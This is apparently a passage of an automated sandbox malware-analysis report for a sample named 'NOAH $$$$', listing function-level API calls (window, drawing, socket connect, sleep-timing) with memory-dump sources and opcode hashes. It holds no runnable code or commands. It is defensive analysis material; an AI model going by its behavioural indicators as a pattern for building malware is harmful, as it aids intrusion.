                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$CloseDeleteOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2095303065-0
                                                                                                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: RectWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 861336768-0
                                                                                                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32 ref: 00449598
                                                                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                                        • _wcslen.LIBCMT ref: 0044960D
                                                                                                                                        • _wcslen.LIBCMT ref: 0044961A
                                                                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1856069659-0
                                                                                                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                        • TrackPopupMenuEx.USER32(02F96390,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1300944170-0
                                                                                                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1822080540-0
                                                                                                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 659298297-0
                                                                                                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                        APIs
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02F91B10,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02F91B10,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 142311417-0
                                                                                                                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                        • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3087257052-0
                                                                                                                                        • Opcode ID: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                                                                                                                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                        • Opcode Fuzzy Hash: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                                                                                                                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 245547762-0
                                                                                                                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2338827641-0
                                                                                                                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4023252218-0
